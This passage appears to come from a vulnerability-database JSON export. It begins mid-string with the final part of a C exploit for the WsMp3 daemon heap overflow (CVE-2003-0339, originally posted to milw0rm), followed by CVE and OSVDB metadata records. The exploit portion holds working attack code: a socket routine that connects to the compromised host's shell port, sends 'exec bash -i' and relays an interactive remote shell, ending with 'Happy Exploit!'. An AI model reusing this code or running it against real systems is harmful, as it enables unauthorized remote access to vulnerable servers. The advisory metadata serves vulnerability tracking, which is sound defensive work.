(3Sec)\\n\");\r\n\tsleep(3);\r\n\t\r\n\tfprintf(stdout,\" [6] Trying %s:%d ...\\n\",hostname,(ATK_CPT));\r\n\ttg_sk=(int)sexsock(hostname,(ATK_CPT));\r\n\t(void)re_connt_lm(tg_sk);\r\n\r\n\tfprintf(stdout,\" [7] Connected to %s:%d !\\n\\n\",hostname,(ATK_CPT));\r\n\t(void)start_shell(tg_sk);\r\n\r\n\texit(0);\r\n}\r\n\r\nint sexsock(char *conn_host_nm,int conn_port_nm)\r\n{\r\n\tint sock;\r\n\tstruct hostent *sxp;\r\n\tstruct sockaddr_in sxp_addr;\r\n \r\n\tif((sxp=gethostbyname(conn_host_nm))==NULL)\r\n\t{\r\n\t\therror(\" [-] gethostbyname() error\");\r\n\t\treturn(-1);\r\n\t}\r\n\tif((sock=socket(AF_INET,SOCK_STREAM,0))==-1)\r\n\t{\r\n\t\tperror(\" [-] socket() error\");\r\n\t\treturn(-1);\r\n\t}\r\n\tsxp_addr.sin_family=AF_INET;\r\n\tsxp_addr.sin_port=htons(conn_port_nm);\r\n\tsxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);\r\n\tbzero(&(sxp_addr.sin_zero),8);\r\n\r\n\tif(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)\r\n\t{\r\n\t\tperror(\" [-] connect() error\");\r\n\t\treturn(-1);\r\n\t}\r\n\r\n\treturn(sock);\r\n}\r\n\r\nvoid start_shell(int st_sock_va)\r\n{\r\n\tint died;\r\n\tchar *command=\"uname -a; id; export TERM=vt100; exec bash -i\\n\";\r\n\tchar readbuf[1024];\r\n\tfd_set rset;\r\n\tmemset((char *)readbuf,0,sizeof(readbuf));\r\n\tfprintf(stdout,\" [*] Executed shell successfully 
!\\n\\n\");\r\n\tsend(st_sock_va,command,strlen(command),0);\r\n\r\n\tfor(;;)\r\n\t{\r\n\t\tfflush(stdout);\r\n\t\tFD_ZERO(&rset);\r\n\t\tFD_SET(st_sock_va,&rset);\r\n\t\tFD_SET(STDIN_FILENO,&rset);\r\n\t\tselect(st_sock_va+1,&rset,NULL,NULL,NULL);\r\n\r\n\t\tif(FD_ISSET(st_sock_va,&rset))\r\n\t\t{\r\n\t\t\tdied=read(st_sock_va,readbuf,sizeof(readbuf)-1);\r\n\t\t\tif(died<=0)\r\n\t\t\t\texit(0);\r\n\t\t\treadbuf[died]=0;\r\n\t\t\tfprintf(stdout,\"%s\",readbuf);\r\n\t\t}\r\n\t\tif(FD_ISSET(STDIN_FILENO,&rset))\r\n\t\t{\r\n\t\t\tdied=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);\r\n\t\t\tif(died>0)\r\n\t\t\t{\r\n\t\t\t\treadbuf[died]=0;\r\n\t\t\t\twrite(st_sock_va,readbuf,died);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn;\r\n}\r\n\r\nvoid re_connt_lm(int st_sock_va)\r\n{\r\n\tif(st_sock_va==-1)\r\n\t{\r\n\t\tfprintf(stdout,\" [-] Failed.\\n\\n\");\r\n\t\tfprintf(stdout,\" Happy Exploit ! :-)\\n\\n\");\r\n\t\texit(-1);\r\n\t}\r\n}\r\n\n\n// milw0rm.com [2003-05-22]\n", "osvdbidlist": ["12028"]}
{"cve": [{"lastseen": "2020-10-03T11:33:02", "description": "Multiple heap-based buffer overflows in WsMp3 daemon (WsMp3d) 0.0.10 and earlier allow remote attackers to execute arbitrary code via long HTTP requests.", "edition": 3, "cvss3": {}, "published": "2003-05-22T04:00:00", "title": "CVE-2003-0339", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2003-0339"], "modified": "2016-10-18T02:32:00", "cpe": ["cpe:/a:wsmp3:wsmp3_daemon:0.0.8", "cpe:/a:wsmp3:wsmp3_daemon:0.0.9", "cpe:/a:wsmp3:wsmp3_web_server:0.0.7", "cpe:/a:wsmp3:wsmp3_daemon:0.0.10"], "id": "CVE-2003-0339", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0339", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wsmp3:wsmp3_daemon:0.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wsmp3:wsmp3_daemon:0.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wsmp3:wsmp3_web_server:0.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wsmp3:wsmp3_daemon:0.0.10:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2003-0339"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-05/0222.html\nISS X-Force ID: 12041\n[CVE-2003-0339](https://vulners.com/cve/CVE-2003-0339)\nBugtraq ID: 7643\n", "modified": "2003-05-21T00:00:00", "published": "2003-05-21T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12028", "id": "OSVDB:12028", "type": "osvdb", "title": 
"WsMp3 Daemon (WsMp3d) HTTP Request Multiple Overflows", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}